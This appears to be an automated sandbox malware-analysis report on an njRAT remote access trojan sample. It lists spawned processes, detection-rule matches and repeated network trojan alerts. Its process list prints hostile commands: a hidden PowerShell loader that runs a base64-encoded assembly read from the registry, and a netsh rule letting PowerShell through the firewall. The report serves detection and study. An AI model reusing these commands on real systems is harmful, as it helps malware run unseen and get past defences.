Windows
Analysis Report
._cache_1.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
._cache_1.exe (PID: 3172 cmdline:
"C:\Users\ user\Deskt op\._cache _1.exe" MD5: 62C01F1B2AC0A7BAB6C3B50FD51E6A36) Tr.exe (PID: 3196 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Tr.exe " MD5: 4D3B21451ED0EE3EE65888D4C8944693)
cmd.exe (PID: 3248 cmdline:
"C:\Window s\System32 \cmd.exe" /c start / min powers hell -Exec utionPolic y Bypass - windowstyl e hidden - noexit -Co mmand [Sys tem.Reflec tion.Assem bly]::Load ([System.C onvert]::F romBase64S tring((Get -ItemPrope rty HKCU:\ Software). Valuex)).E ntryPoint. Invoke($Nu ll,$Null) MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) powershell.exe (PID: 3276 cmdline:
powershell -Executio nPolicy By pass -wind owstyle hi dden -noex it -Comman d [System. Reflection .Assembly] ::Load([Sy stem.Conve rt]::FromB ase64Strin g((Get-Ite mProperty HKCU:\Soft ware).Valu ex)).Entry Point.Invo ke($Null,$ Null) MD5: A575A7610E5F003CC36DF39E07C4BA7D) netsh.exe (PID: 3396 cmdline:
netsh fire wall add a llowedprog ram "C:\Wi ndows\Syst em32\Windo wsPowerShe ll\v1.0\po wershell.e xe" "power shell.exe" ENABLE MD5: 637982A421D0133DCEAA0D1490D1DC9C)
cmd.exe (PID: 3452 cmdline:
"C:\Window s\System32 \cmd.exe" /c start / min powers hell -Exec utionPolic y Bypass - windowstyl e hidden - noexit -Co mmand [Sys tem.Reflec tion.Assem bly]::Load ([System.C onvert]::F romBase64S tring((Get -ItemPrope rty HKCU:\ Software). Valuex)).E ntryPoint. Invoke($Nu ll,$Null) MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) powershell.exe (PID: 3480 cmdline:
powershell -Executio nPolicy By pass -wind owstyle hi dden -noex it -Comman d [System. Reflection .Assembly] ::Load([Sy stem.Conve rt]::FromB ase64Strin g((Get-Ite mProperty HKCU:\Soft ware).Valu ex)).Entry Point.Invo ke($Null,$ Null) MD5: A575A7610E5F003CC36DF39E07C4BA7D)
x.exe (PID: 3612 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\x.exe" MD5: 62C01F1B2AC0A7BAB6C3B50FD51E6A36) Tr.exe (PID: 3640 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Tr.exe " MD5: 4D3B21451ED0EE3EE65888D4C8944693)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
NjRAT | RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored. |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
Windows_Trojan_Njrat_30f3c220 | unknown | unknown |
| |
RAT_njRat | Detects njRAT | Kevin Breen <kevin@techanarchy.net> |
| |
njrat1 | Identify njRat | Brian Wallace @botnet_hunter |
| |
JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Njrat | Yara detected Njrat | Joe Security | ||
Windows_Trojan_Njrat_30f3c220 | unknown | unknown |
| |
RAT_njRat | Detects njRAT | Kevin Breen <kevin@techanarchy.net> |
| |
njrat1 | Identify njRat | Brian Wallace @botnet_hunter |
| |
MALWARE_Win_NjRAT | Detects NjRAT / Bladabindi | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113, Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Timestamp: | 07/01/24-10:22:43.879655 |
SID: | 2017419 |
Source Port: | 49166 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:25:00.126873 |
SID: | 2017419 |
Source Port: | 49176 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:24:33.177434 |
SID: | 2017419 |
Source Port: | 49174 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:25:27.489939 |
SID: | 2017419 |
Source Port: | 49178 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:23:24.901144 |
SID: | 2017419 |
Source Port: | 49169 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:24:19.571508 |
SID: | 2017419 |
Source Port: | 49173 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:22:30.431063 |
SID: | 2017419 |
Source Port: | 49165 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:23:52.503013 |
SID: | 2017419 |
Source Port: | 49171 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:22:03.684189 |
SID: | 2017419 |
Source Port: | 49163 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:23:38.664413 |
SID: | 2017419 |
Source Port: | 49170 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:22:57.541620 |
SID: | 2017419 |
Source Port: | 49167 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:24:46.813104 |
SID: | 2017419 |
Source Port: | 49175 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:25:13.886977 |
SID: | 2017419 |
Source Port: | 49177 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:24:06.132111 |
SID: | 2017419 |
Source Port: | 49172 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:21:49.438511 |
SID: | 2017419 |
Source Port: | 49162 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:23:11.211027 |
SID: | 2017419 |
Source Port: | 49168 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 07/01/24-10:22:16.980393 |
SID: | 2017419 |
Source Port: | 49164 |
Destination Port: | 1177 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Avira: |
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Static PE information: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Code function: | 0_2_004339B6 | |
Source: | Code function: | 0_2_0044BD27 | |
Source: | Code function: | 0_2_0044BF8B | |
Source: | Code function: | 0_2_00452492 | |
Source: | Code function: | 0_2_00442886 | |
Source: | Code function: | 0_2_004788BD | |
Source: | Code function: | 0_2_0045CAFA | |
Source: | Code function: | 0_2_00431A86 | |
Source: | Code function: | 0_2_0045DE8F | |
Source: | Code function: | 1_2_00B2449B | |
Source: | Code function: | 1_2_00B2C7E8 | |
Source: | Code function: | 1_2_00B2C75D | |
Source: | Code function: | 1_2_00B2F021 | |
Source: | Code function: | 1_2_00B2F17E | |
Source: | Code function: | 1_2_00B2F47F | |
Source: | Code function: | 1_2_00B23833 | |
Source: | Code function: | 1_2_00B23B56 | |
Source: | Code function: | 1_2_00B2BD48 | |
Source: | Code function: | 12_2_0040449B | |
Source: | Code function: | 12_2_0040C75D | |
Source: | Code function: | 12_2_0040C7E8 | |
Source: | Code function: | 12_2_0040F021 | |
Source: | Code function: | 12_2_0040F17E | |
Source: | Code function: | 12_2_0040F47F | |
Source: | Code function: | 12_2_00403833 | |
Source: | Code function: | 12_2_00403B56 | |
Source: | Code function: | 12_2_0040BD48 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | DNS query: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | Code function: | 0_2_004422FE |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 0_2_0045A10F |
Source: | Code function: | 0_2_0045A10F | |
Source: | Code function: | 1_2_00B3427A | |
Source: | Code function: | 12_2_0041427A |
Source: | Code function: | 0_2_0046DC80 |
Source: | Code function: | 0_2_0044C37A |
Source: | Code function: | 0_2_0047C81C | |
Source: | Code function: | 1_2_00B4CB26 | |
Source: | Code function: | 12_2_0042CB26 |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Code function: | 1_2_00AC3B4C | |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | memstr_2ccbde9e-c | |
Source: | String found in binary or memory: | memstr_a087d829-7 | |
Source: | Code function: | 12_2_003A3B4C | |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | memstr_d5d18cac-2 | |
Source: | String found in binary or memory: | memstr_ee892166-0 | |
Source: | String found in binary or memory: | memstr_43b68f85-8 | |
Source: | String found in binary or memory: | memstr_ed1a719d-c |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Code function: | 0_2_00431BE8 |
Source: | Code function: | 0_2_00446313 |
Source: | Code function: | 0_2_004333BE | |
Source: | Code function: | 1_2_00B25264 | |
Source: | Code function: | 12_2_00405264 |
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_0042200C | |
Source: | Code function: | 0_2_0041A217 | |
Source: | Code function: | 0_2_00412216 | |
Source: | Code function: | 0_2_0042435D | |
Source: | Code function: | 0_2_004033C0 | |
Source: | Code function: | 0_2_004125E8 | |
Source: | Code function: | 0_2_0044663B | |
Source: | Code function: | 0_2_004096A0 | |
Source: | Code function: | 0_2_00413801 | |
Source: | Code function: | 0_2_0042096F | |
Source: | Code function: | 0_2_004129D0 | |
Source: | Code function: | 0_2_004119E3 | |
Source: | Code function: | 0_2_0041C9AE | |
Source: | Code function: | 0_2_0047EA6F | |
Source: | Code function: | 0_2_0040FA10 | |
Source: | Code function: | 0_2_00423C81 | |
Source: | Code function: | 0_2_00411E78 | |
Source: | Code function: | 0_2_00442E0C | |
Source: | Code function: | 0_2_00420EC0 | |
Source: | Code function: | 0_2_0044CF17 | |
Source: | Code function: | 0_2_00444FD2 | |
Source: | Code function: | 1_2_00B408E2 | |
Source: | Code function: | 1_2_00ACE800 | |
Source: | Code function: | 1_2_00AE3307 | |
Source: | Code function: | 1_2_00ACE060 | |
Source: | Code function: | 1_2_00AD4140 | |
Source: | Code function: | 1_2_00AE2345 | |
Source: | Code function: | 1_2_00B40465 | |
Source: | Code function: | 1_2_00AF6452 | |
Source: | Code function: | 1_2_00AF25AE | |
Source: | Code function: | 1_2_00AE277A | |
Source: | Code function: | 1_2_00AD6841 | |
Source: | Code function: | 1_2_00AF69C4 | |
Source: | Code function: | 1_2_00B28932 | |
Source: | Code function: | 1_2_00B1E928 | |
Source: | Code function: | 1_2_00AF890F | |
Source: | Code function: | 1_2_00AD8968 | |
Source: | Code function: | 1_2_00AECCA1 | |
Source: | Code function: | 1_2_00AF6F36 | |
Source: | Code function: | 1_2_00AD70FE | |
Source: | Code function: | 1_2_00AD3190 | |
Source: | Code function: | 1_2_00AC1287 | |
Source: | Code function: | 1_2_00AEF359 | |
Source: | Code function: | 1_2_00AD5680 | |
Source: | Code function: | 1_2_00AE1604 | |
Source: | Code function: | 1_2_00AD58C0 | |
Source: | Code function: | 1_2_00AE7813 | |
Source: | Code function: | 1_2_00AE1AF8 | |
Source: | Code function: | 1_2_00AEDAF5 | |
Source: | Code function: | 1_2_00AF9C35 | |
Source: | Code function: | 1_2_00B47E0D | |
Source: | Code function: | 1_2_00ACFE40 | |
Source: | Code function: | 1_2_00AEBF26 | |
Source: | Code function: | 1_2_00AE1F10 | |
Source: | Code function: | 4_2_000007FE93D7F836 | |
Source: | Code function: | 4_2_000007FE93D797E8 | |
Source: | Code function: | 4_2_000007FE93D805E2 | |
Source: | Code function: | 4_2_000007FE93D7F339 | |
Source: | Code function: | 4_2_000007FE93D745C5 | |
Source: | Code function: | 4_2_000007FE93E41416 | |
Source: | Code function: | 12_2_003AE800 | |
Source: | Code function: | 12_2_004208E2 | |
Source: | Code function: | 12_2_003C3307 | |
Source: | Code function: | 12_2_003AE060 | |
Source: | Code function: | 12_2_003B4140 | |
Source: | Code function: | 12_2_003C2345 | |
Source: | Code function: | 12_2_00420465 | |
Source: | Code function: | 12_2_003D6452 | |
Source: | Code function: | 12_2_003D25AE | |
Source: | Code function: | 12_2_003C277A | |
Source: | Code function: | 12_2_003B6841 | |
Source: | Code function: | 12_2_003FE928 | |
Source: | Code function: | 12_2_003D890F | |
Source: | Code function: | 12_2_003B8968 | |
Source: | Code function: | 12_2_00408932 | |
Source: | Code function: | 12_2_003D69C4 | |
Source: | Code function: | 12_2_003CCCA1 | |
Source: | Code function: | 12_2_003D6F36 | |
Source: | Code function: | 12_2_003B70FE | |
Source: | Code function: | 12_2_003B3190 | |
Source: | Code function: | 12_2_003A1287 | |
Source: | Code function: | 12_2_003CF359 | |
Source: | Code function: | 12_2_003C1604 | |
Source: | Code function: | 12_2_003B5680 | |
Source: | Code function: | 12_2_003C7813 | |
Source: | Code function: | 12_2_003B58C0 | |
Source: | Code function: | 12_2_003C1AF8 | |
Source: | Code function: | 12_2_003CDAF5 | |
Source: | Code function: | 12_2_003D9C35 | |
Source: | Code function: | 12_2_00427E0D | |
Source: | Code function: | 12_2_003AFE40 | |
Source: | Code function: | 12_2_003CBF26 | |
Source: | Code function: | 12_2_003C1F10 |
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | Classification label: |
Source: | Code function: | 0_2_0044AF6C |
Source: | Code function: | 0_2_004333BE | |
Source: | Code function: | 0_2_00464EAE | |
Source: | Code function: | 1_2_00B184F3 | |
Source: | Code function: | 1_2_00B18AA3 | |
Source: | Code function: | 12_2_003F84F3 | |
Source: | Code function: | 12_2_003F8AA3 |
Source: | Code function: | 0_2_0045D619 |
Source: | Code function: | 0_2_004755C4 |
Source: | Code function: | 0_2_0046E48D |
Source: | Code function: | 0_2_0043305F |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | LNK file: |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Data Obfuscation |
---|
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: |
Source: | Code function: | 0_2_0040EBD0 |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Code function: | 0_2_00416CC8 | |
Source: | Code function: | 1_2_00AE8AD8 | |
Source: | Code function: | 4_2_000007FE93D70241 | |
Source: | Code function: | 4_2_000007FE93D700C1 | |
Source: | Code function: | 4_2_000007FE93D72471 | |
Source: | Code function: | 12_2_003AC599 | |
Source: | Code function: | 12_2_003C8AD8 |
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival |
---|
Source: | Registry value created or modified: | Jump to behavior |
Source: | Registry value created or modified: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Source: | Code function: | 0_2_0047A330 | |
Source: | Code function: | 0_2_00434418 | |
Source: | Code function: | 1_2_00AC4A35 | |
Source: | Code function: | 1_2_00B453DF | |
Source: | Code function: | 12_2_003A4A35 | |
Source: | Code function: | 12_2_004253DF |
Source: | Code function: | 1_2_00AE3307 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
